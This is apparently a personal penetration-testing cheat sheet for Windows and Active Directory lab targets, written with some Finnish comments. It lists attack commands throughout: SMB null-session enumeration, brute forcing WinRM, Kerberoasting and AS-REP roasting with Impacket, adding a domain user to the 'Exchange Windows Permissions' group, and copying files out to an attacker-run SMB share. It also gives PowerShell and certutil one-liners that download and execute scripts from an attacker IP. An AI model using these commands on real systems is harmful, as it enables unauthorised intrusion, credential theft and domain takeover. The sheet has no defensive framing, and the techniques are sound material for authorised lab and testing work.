Windows
Create user and assign to group
net user zolaboo password /add /domain
net group "Exchange Windows Permissions" /add zolaboo
SMB STUFF
LIST SHARES (NULL SESSION)
smbclient -L \\10.129.1.39 -N
LOGIN SMB (NULL SESSION)
smbclient "//10.129.1.39/Backups" -N
LIST SHARES (USER)
crackmapexec smb 10.129.1.39 -u "user" -p "password" --shares
smbmap -d DOMAIN -u USERNAME -p PASSWORD -H IP
PASSWORD POLICY
crackmapexec smb --pass-pol IP --> password policy
Account Lockout ThreshHold: Jos none, voi kokeilla monta kertaa haluaa -> BRUTE
FORCE
Reset Account Lockout Counter: --> jos lockout threshold ei ole none, niin kertoo
"banniajan"
MOUNT SMB SHARES
sudo mount -t cifs //<vpsa_ip_address>/<export_share> /mnt/<local_share>
MOUNT VHD IMAGE
sudo guestmount --add <vhdfile>.vhd --inspector --ro /mnt/<location> -v
SMB SHARE ON LINUX/WINDOWS
smbserver.py SHARE . -smb2support -username df -password df
TO SEND FILE (ON WINDOWS)
net use \\10.10.14.105\SHARE /u:df df
copy FILENAME \\10.10.14.105\SHARE
FTP SEND FILE
## on attacker machine
python3 -m pyftpdlib 21
## on target
ftp xx.xx.xx.xx
WINDOWS REMOTE
BASIC
rpcclient ip
NULL USER
rpcclient -U ''
RPCCLIENT COMMANDS
enumdomusers --> listaa käyttäjät
queryuser USERNAME --> tarkemmat tiedot
querydispinfo --> käyttäjätietoja
enumdomgroups --> hakee groupit
querygroup GROUPRID --> hakee groupin tietoja
querygroupmem GROUPID -> hakee groupin jäsenet
WINRM BRUTE FORCE
crackmapexec winrm IP -u USERNAME/FILENAME -p PASSWORD
EVIL-WINRM (SHELL)
evil-winrm -u USER -p PASSWORD -i IP
ENUM SCRIPTEJÄ
- https://github.com/GhostPack/Seatbelt (build on different dotnet if needed)
- https://github.com/411Hall/JAWS
- https://github.com/rasta-mouse/Sherlock
- https://github.com/rasta-mouse/Watson
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
- https://github.com/AonCyberLabs/Windows-Exploit-Suggester (NO NEED TO EXEC)
POWERSHELL
-gci -> (ls)
-gci -Hidden -> (ls -la)
gc FILENAME (cat)
net user (list users)
net user USERNAME (info about user)
[environment]::getEnvironmentVariable('PROCESSOR_ARCHITECTURE', 'machine') (arch info)
net user bolazoo password1 /add /domain (add user)
net group "Exchange Windows Permissions" /add bolazoo (add to group)
BLOODHOUND (IN WINDOWS)
runas /netonly /user:active.htb\SVC_TGS cmd
cd C:\Users\Joonas\Downloads\SharpHound3\SharpHound3\bin\Release
SharpHound.exe -c all -d active.htb --domaincontroller 10.129.114.89
BLOODHOUND (LINUX)
cd /usr/bin
./neo4j console
cd ~/Documents/BloodHound-linux-x64$
./BloodHound --no-sandbox
AFTER BLOODHOUND (IF SUCCESS) (LINUX)
GetUserSPNs.py -dc-ip 10.129.114.89 -request active.htb/SVC_TGS
KERBEROS ATTACK PATHS
GetNPUsers.py -dc-ip <ip-address> -request '<domain>/' (NULL SESSION)
GetUserSPNs.py -dc-ip <ip-address> -request <domain>/<username> (AUTH)
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
DOWNLOADING AND EXECUTING FILES
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.98:8000/sherlock.ps1' ) | powershell -noprofile -
echo IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.98:8000/winPEAS.exe', 'winPEAS.exe') | powershell
certutil -f -urlcache http://IP:PORT/filename file.exe
powershell Invoke-WebRequest -UseBasicParsing 10.10.16.8:8000/winPEASx64.exe -OutFile winPEASx64.exe
PLINK (CHISEL LIKE FOR WINDOWS)
https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d
RESPONDER (to phish hashes)
https://github.com/lgandx/Responder